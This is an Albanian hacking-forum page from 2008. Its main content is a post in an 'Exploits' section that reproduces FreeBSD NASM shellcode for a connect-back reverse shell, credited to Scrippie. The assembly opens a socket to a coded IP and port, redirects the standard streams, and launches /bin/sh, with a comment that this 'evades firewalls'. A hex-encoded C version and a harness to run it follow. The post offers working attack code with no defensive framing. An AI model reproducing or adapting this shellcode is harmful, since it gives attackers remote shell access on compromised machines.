ForumPortaliGalleryPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi
...:::Meny Kryesore:::...
 Home
 Portali
 Forum
 Lista e Antarve
 Galeria
 Lajmet Flash
 Profili
 FAQ
 Testi I Dashuris
favoritos.gif Media & Muzika
 Telivizionet Live
 Video Klipe
 Ruzulltatet Sportive
 Mp3 Falass
 Mp3 RAP
 Kerkesa Muzikore
 Melodi Per Celular
icon_community.gif Argėtim-Zbavitje
 Video Humoristike
 Luani Lojra
 Dezing
 Poezi
 Gediche
 Argėtime
 Albumi Fotografik
 Tema tė Ndryshme
som_downloads.gif Shkarkime & Links
King-Rap Tolbar
Programe
Shkarko Scripte
Chat Programs
 Kėrko nė Forum
 Liderėt e forumit
 Ndihmė
 Kėrko
Moti Momental

Permbajta e ksaj faqe kerkon flash player per instalim kliko mbi ket tekst.


Futu nė chat

Top 5 softuerėt antivirus pėr 2008
HTML clipboard
Top 5 softuerėt antivirus pėr 2008

1. Bit Defender

2. Kaspersky

3. Eset NOD32

4. Trend Micro Antivirus

    plus AntiSpyware 

5. F-Secure Anti-Virus 

SMS Falas nga KING-RaP
Partnerėt
>>> AlBaZeMeR <<<

XoFaCe

->>Ks-MaX <<<---

->> KoSoVa.Li <<<---

 ->> Muzik-Anglisht <<<---

V.I.P Galeri

Top posters
kanuni
 
Xhebraili
 
vissari
 
El-Fuego
 
drini-89
 
RiRi
 
dj-baba
 
dosti
 
king
 
miri
 
Keywords
IP Addressa Juaj&Reklama
IP


Share | 
 

 BSD Passive Connection Shellcode

Shiko temėn e mėparshme Shiko temėn pasuese Shko poshtė 
AutoriMesazh
El-Fuego



Numri i postimeve : 159
Join date : 12/06/2008
Age : 104
Location : Peja Morder City

MesazhTitulli: BSD Passive Connection Shellcode   Thu Jun 12, 2008 8:11 pm

; Passive Connection Shellcode
;
; Coded by Scrippie - ronald@grafix.nl - http://b0f.freebsd.lublin.pl
; Buffer0verfl0w Security
; Why? This evades firewalls...
;
; YES, this is for NASM, I detest AT&T syntaxis - it's gross and unreadable
;
; This is the FreeBSD variant I whipped up
;
; Tnx to dvorak for pointing out that BSD's int 80h assumes a stored EIP
; on the stack before making it and that BSD has a somewhat different
; sockaddr_in structure (containing sin_len)

BITS 32

; Equates - keeps this stuff a lot more clear

PORT equ 31337 ; What an eleet port!

_exit equ 1 ; See /usr/src/sys/kern/syscalls.c
execve equ 59 ; See /usr/src/sys/kern/syscalls.c
dup2 equ 90 ; See /usr/src/sys/kern/syscalls.c
socket equ 97 ; See /usr/src/sys/kern/syscalls.c
connect equ 98 ; See /usr/src/sys/kern/syscalls.c

IPPROTO_TCP equ 6 ; See netinet/in.h
PF_INET equ 2 ; See sys/socket.h
SOCK_STREAM equ 1 ; See sys/socket.h

sockaddr_in_off equ 0
shell_off equ 8
shell_ptr_off equ 16

jmp short EndCode

Start:
pop esi ; Get offset data in esi

xor eax, eax
xor ebx, ebx

mov bl, IPPROTO_TCP ; Push IPPROTO_TCP
push ebx
mov bl, SOCK_STREAM ; Push SOCK_STREAM
push ebx
mov bl, PF_INET ; Push PF_INET
push ebx
push ebx ; Skipped by int 80h
mov al, socket ; Select socket() syscall

int 80h ; socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
mov edx, eax ; Save the resulting socket descriptor

mov byte [esi+sockaddr_in_off+1], PF_INET ; sin_family -> PF_INET
mov word [esi+sockaddr_in_off+2], PORT ; Set the port number

mov bl, 16 ; sizeof(sockaddr_in)
push ebx

lea ebx, [esi+sockaddr_in_off] ; Get offset sockaddr_in into ebx
push ebx ; Push it
push eax ; Still holds sockfd
push eax ; Canary value

mov al, connect ; Select connect() syscall
int 80h ; connect(sockfd, sockaddr_in, 10)

xor ebx, ebx
push ebx
push edx
mov al, dup2 ; Select dup2 syscall

push eax ; Ruined
int 80h

inc bl
push ebx
push edx
mov al, dup2 ; Do the same for stdout

push eax
int 80h

inc bl
push ebx
push edx
mov al, dup2 ; And finally for stderr

push eax
int 80h

xor ebx, ebx
push ebx ; *envp == NULL

lea edi, [esi+shell_off+7]
xor eax, eax
xor ecx, ecx
mov cl, 9
repe stosb

lea ebx, [esi+shell_off] ; Get offset shell into ebx
mov [esi+shell_ptr_off], ebx ; Store it at shell_off
lea ecx, [esi+shell_ptr_off] ; Get offset shell_off into ecx
push ecx ; argp
push ebx ; command

push eax ; canary
mov al, execve
int 80h ; Spawn the frikkin' shell

mov al, _exit ; _exit() system call
int 80h ; Do it

EndCode:
call Start

sockaddr_in db 'ABCC' ; A=sin_len - B=sin_family - C=port
dd 0x100007f ; IP addr (s_addr) in htonl() form
; 8 bytes not needed Wink

shell db '/bin/sh' ;,0
;shell_ptr db 1,2,3,4

------------------------------------------------------------------------------

And here's the shellcode equivalent

char shellcode[]=
"\xeb\x68\x5e\x31\xc0\x31\xdb\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x53\xb0\x61\x
cd\x80\x89\xc2\xc6\x46\x01\x02\x66\xc7\x46\x02\x69\x7a\xb3\x10\x53\x8d\x1e\x53\
x50\x50\xb0\x62\xcd\x80\x31\xdb\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0
\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0\x5a\x50\xcd\x80\x31\xdb\x53\x8d\x7e\x0f\x3
1\xc0\x31\xc9\xb1\x09\xf3\xaa\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10\x51\x53\x50\x
b0\x3b\xcd\x80\xb0\x01\xcd\x80\xe8\x93\xff\xff\xff\x41\x42\x43\x43\x7f\x00\x00\
x01\x2f\x62\x69\x6e\x2f\x73\x68"; ^
Start of IP addr
void main() {
int *ret;

ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit
 
BSD Passive Connection Shellcode
Shiko temėn e mėparshme Shiko temėn pasuese Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: ..:: INFORMATIKA ::.. :: Exploits-
Kėrce tek: